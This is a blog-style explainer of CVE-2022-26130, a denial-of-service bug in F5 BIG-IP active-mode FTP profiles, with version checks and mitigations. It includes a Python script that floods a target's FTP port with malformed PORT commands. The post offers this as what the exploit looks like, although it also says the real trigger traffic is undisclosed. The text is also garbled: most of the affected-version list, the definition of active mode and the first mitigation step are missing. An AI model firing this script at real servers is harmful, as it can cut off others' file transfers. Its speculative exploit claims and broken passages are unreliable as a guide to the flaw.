CVE-2022-26130 - How a F5 BIG-IP FTP Profile Bug Can Cut Off Your Connections

In early 2022, a significant vulnerability—CVE-2022-26130—was found in F5’s BIG-IP devices, commonly used by enterprises for load balancing and network management. This flaw may sound niche, but if your network uses FTP (File Transfer Protocol) "Active mode" through a BIG-IP virtual server, this bug could suddenly disconnect your users or services.

This post uses simple, straightforward language to explain what CVE-2022-26130 is, who’s affected, what the risk is, and how to check or mitigate it step by step. We’ll cover some background, give code snippets you can use to test your system, and walk through what an exploit might look like. This is an exclusive, long-form look—let’s get started.

What Is CVE-2022-26130?

CVE-2022-26130 is a denial-of-service (DoS) type vulnerability. It affects certain versions of F5 BIG-IP when handling "Active mode" FTP connections.

In Plain English:
If you set up BIG-IP to manage FTP connections using "Active Mode," certain types of network traffic can make the server just stop accepting FTP data channels—cutting off file transfers.

13.1.x versions before 13.1.5

> Note: Versions past end-of-support weren't evaluated—so if you’re running something even older, you could be at risk but aren’t officially covered.

Passive Mode: The client connects to the server for both "command" and "data" channels.

This bug happens only in Active Mode which is often used for legacy equipment or certain application setups.

F5’s BIG-IP device lets administrators set up an "FTP profile" on a virtual server to handle FTP traffic properly. But with active mode enabled, undisclosed (i.e. technically unknown but possible-to-generate) traffic can break handling of the data channel.

Impact:
When the bug is triggered—intentionally by an attacker or accidentally—the virtual server stops processing active FTP data connections altogether. Your users can’t transfer files until you restart (or at least reconfigure) your BIG-IP service.

Original References

- F5 Security Advisory K15382123 (Official)
- National Vulnerability Database CVE-2022-26130 Entry

Organizations with virtual servers managing legacy applications.

- Service providers allowing FTP uploads/downloads via a BIG-IP load balancer.

Not at risk?
If you use only passive mode FTP, SFTP, or if you don’t use FTP at all, you’re unaffected.

How Could an Attacker Exploit This?

The exploit is a simple denial-of-service:
If an attacker knows your organization is using active-mode FTP through F5 BIG-IP, they can send crafted or even malformed FTP commands/sequences to your virtual server, causing it to stop accepting further active data connections.

Assume the attacker can connect to your FTP service. They could

# This is what an *honest* FTP client might do:
ftp> open ftp.targetdomain.com
# login as normal
ftp> put somefile.txt

But an attacker could automate sending malformed or repeated FTP PORT commands to exhaust or confuse the BIG-IP’s FTP profile:

import socket

def send_malformed_port(ip, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(b'USER anonymous\r\n')
    s.send(b'PASS anon@\r\n')
    # PORT command for active mode, with bad parameters
    for i in range(100):  # rapid fire
        s.send(b'PORT 999,999,999,999,999,999\r\n')
    s.close()

# Use wisely, for testing on your own systems!
send_malformed_port('ftp.targetdomain.com', 21)

*(Don’t run this on any server you don’t own! This code is for demonstration.)*

This kind of unexpected traffic is what the F5 bug fails to handle—shutting down the virtual server’s ability to manage active mode data channels.

How to Check if You’re Vulnerable

Step 1: Check your BIG-IP version

SSH into your F5 device or use the admin GUI

tmsh show /sys version

*Does the output say you’re running before 16.1.2.2, 15.1.5.1, 14.1.4.6, or 13.1.5?*

Step 2: Check FTP Profile Settings

In the GUI under Local Traffic > Profiles > Services > FTP

Alternatively, via command

tmsh list ltm profile ftp

2. Switch to Passive Mode FTP (If Possible)

If you can make your applications use passive mode rather than active, this vulnerability won’t affect you.

3. Restrict FTP Access

Limit IP addresses allowed to access your FTP service.

4. Monitor

Set up monitoring to alert you if FTP uploads/downloads suddenly fail or drop to zero.

Real-World Exploit Example: A Timing Nightmare

Let’s say you run a business that receives automated files from outside customers every two hours. One day, a script-kiddie discovers your BIG-IP is an old version and floods your FTP with malformed active mode commands right before a big transfer.
Your service stops accepting data channel connections. Suddenly, your business can’t receive files—and you lose hours or even a day until someone restarts the virtual server.

That's the danger—simple, silent, and destructive.

Conclusion

CVE-2022-26130 might seem obscure, but in FTP-heavy or legacy environments, it’s a big deal. The fix is simple: upgrade your F5 BIG-IP, use passive mode if possible, and always restrict unnecessary access.

Further Reading

- F5 K15382123 - Security Advisory for CVE-2022-26130
- CVE-2022-26130 @ NVD

Disclaimer

This information is provided for responsible system administration and education. Testing should only be performed on systems you own or manage. Never use attack techniques on other organizations’ networks.

Timeline

Published on: 05/05/2022 17:15:00 UTC
Last modified on: 05/16/2022 12:34:00 UTC